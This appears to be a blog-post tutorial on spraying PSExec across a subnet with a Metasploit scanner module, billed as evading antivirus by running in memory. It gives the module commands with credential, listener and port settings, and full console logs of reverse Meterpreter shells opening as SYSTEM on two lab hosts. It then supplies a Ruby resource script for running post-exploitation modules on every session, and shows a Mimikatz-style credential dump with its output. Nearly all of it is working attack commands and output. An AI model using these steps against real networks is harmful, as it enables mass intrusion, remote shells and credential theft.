control – mass psexec sprayer

How to mass PSExec using Powershell so no clean-up and more likely to bypass AV as runs in memory. 

1. PSExec Scanner Auxiliary Module from http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html git hub script https://raw.githubusercontent.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

2. Create a new MSF module SMB directory so you can add your own script

mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/

3. Place a copy of psexec_scanner.rb into /root/.msf4/modules/auxiliary/scanner/smb/

4. This script uses psexec which now defaults to PS so no need to add any payload options simply add the below

use auxiliary/scanner/smb/psexec_scanner.rb
set rhosts 192.168.56.0/24
set smbpass The_Password_or_Password_Hash
set smbuser The_Username
set threads 5
set lhost Your-IP-Address
set lport 4444
run

Then sit back and count the shells

msf auxiliary(psexec_scanner) run

[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.1: – 192.168.56.1:445 – TCP OPEN
[*] 192.168.56.1: – Trying The_Username:The_Password_or_Password_Hash
[*] Starting the payload handler…
[*] 192.168.56.1:445 – Connecting to the server…
[*] 192.168.56.1:445 – Authenticating to 192.168.56.1:445|WORKGROUP as user ‘The_Username’…
[-] 192.168.56.1:445 – Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] 192.168.56.101: – 192.168.56.101:445 – TCP OPEN
[*] 192.168.56.101: – Trying The_Username:The_Password_or_Password_Hash
[*] 192.168.56.103: – 192.168.56.103:445 – TCP OPEN
[*] 192.168.56.103: – Trying The_Username:The_Password_or_Password_Hash
[*] 192.168.56.101:445 – Connecting to the server…
[*] 192.168.56.101:445 – Authenticating to 192.168.56.101:445|WORKGROUP as user ‘The_Username’…
[*] 192.168.56.103:445 – Connecting to the server…
[*] 192.168.56.103:445 – Authenticating to 192.168.56.103:445|WORKGROUP as user ‘The_Username’…
[*] 192.168.56.103:445 – Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.56.103:445 – PowerShell found
[*] 192.168.56.103:445 – Selecting PowerShell target
[*] 192.168.56.103:445 – Powershell command length: 2385
[*] 192.168.56.103:445 – Executing the payload…
[*] 192.168.56.103:445 – Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.103[\svcctl] …
[*] 192.168.56.103:445 – Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.103[\svcctl] …
[*] 192.168.56.103:445 – Obtaining a service manager handle…
[*] 192.168.56.103:445 – Creating the service…
[*] 192.168.56.101:445 – Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.56.101:445 – PowerShell found
[*] 192.168.56.101:445 – Selecting PowerShell target
[*] 192.168.56.101:445 – Powershell command length: 2393
[*] 192.168.56.101:445 – Executing the payload…
[*] 192.168.56.101:445 – Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.101[\svcctl] …
[*] 192.168.56.101:445 – Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.101[\svcctl] …
[*] 192.168.56.101:445 – Obtaining a service manager handle…
[*] 192.168.56.101:445 – Creating the service…
[+] 192.168.56.103:445 – Successfully created the service
[*] 192.168.56.103:445 – Starting the service…
[+] 192.168.56.103:445 – Service start timed out, OK if running a command or non-service executable…
[*] 192.168.56.103:445 – Removing the service…
[+] 192.168.56.103:445 – Successfully removed the sevice
[*] 192.168.56.103:445 – Closing service handle…
[+] 192.168.56.101:445 – Successfully created the service
[*] 192.168.56.101:445 – Starting the service…
[+] 192.168.56.101:445 – Service start timed out, OK if running a command or non-service executable…
[*] 192.168.56.101:445 – Removing the service…
[+] 192.168.56.101:445 – Successfully removed the sevice
[*] 192.168.56.101:445 – Closing service handle…

[*] Sending stage (957999 bytes) to 192.168.56.103

[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.103:49161) at 2016-09-29 13:09:37 +0100

[*] Sending stage (957999 bytes) to 192.168.56.101

[*] Meterpreter session 2 opened (192.168.56.105:4444 – 192.168.56.101:49158) at 2016-09-29 13:09:42 +0100

[*] Scanned 107 of 256 hosts (41% complete)
[*] Scanned 131 of 256 hosts (51% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(Psexec_Mass_Scan) sessions

Active sessions

===============
Id Type Information Connection
— —- ———– ———-
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ IE11WIN7 192.168.56.105:4444 -> 192.168.56.103:49161 (192.168.56.103)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ IE11WIN7 192.168.56.105:4444 -> 192.168.56.101:49158 (192.168.56.101)

————-
Then to perform post exploits against all sessions at once

1. Create a ruby resource script taken from here https://k0st.wordpress.com/2015/07/10/running-commands-on-multiple-meterpreter-sessions/

2. Copy the below, paste into a file and save to a directory

<ruby>
framework.sessions.each do |num,session|
run_single(“set SESSION #{num}”)
print_status(“Running #{active_module.fullname} against session #{num}”)
run_single(“run -j”)
sleep 1
end
</ruby>

3. Go into your chosen post module and run 

resource /root/Desktop/MSF/runall-jobs.rc

Using it with Mimikatz

use post/windows/gather/credentials/sso

msf post(sso) > resource /root/Desktop/MSF/runall-jobs.rc 

msf post(sso) > resource /root/Desktop/MSF/runall-jobs.rc

[*] Processing /root/Desktop/MSF/runall-jobs.rc for ERB directives.

[*] resource (/root/Desktop/MSF/runall-jobs.rc)> Ruby Code (180 bytes)

SESSION => 1

[*] Running post/windows/gather/credentials/sso against session 1
[*] Post module running as background job 
[*] Running module against IE11WIN7
SESSION => 2
[*] Running post/windows/gather/credentials/sso against session 2
[*] Post module running as background job
[*] Running module against IE11WIN7

Windows SSO Credentials

=======================

 

AuthID Package Domain User Password
—— ——- —— —- ——–
0;100695 NTLM IE11WIN7 The_Username The_Password_or_Password_Hash
0;100695 NTLM IE11WIN7 The_Username 
0;101108 NTLM IE11WIN7 The_Username The_Password_or_Password_Hash
0;101108 NTLM IE11WIN7 The_Username  
msf post(sso) >

Windows SSO Credentials

=======================
AuthID Package Domain User Password

—— ——- —— —- ——–

0;73188 NTLM IE11WIN7 The_Username The_Password_or_Password_Hash
0;73188 NTLM IE11WIN7 The_Username 
0;73226 NTLM IE11WIN7 The_Username The_Password_or_Password_Hash
0;73226 NTLM IE11WIN7 The_Username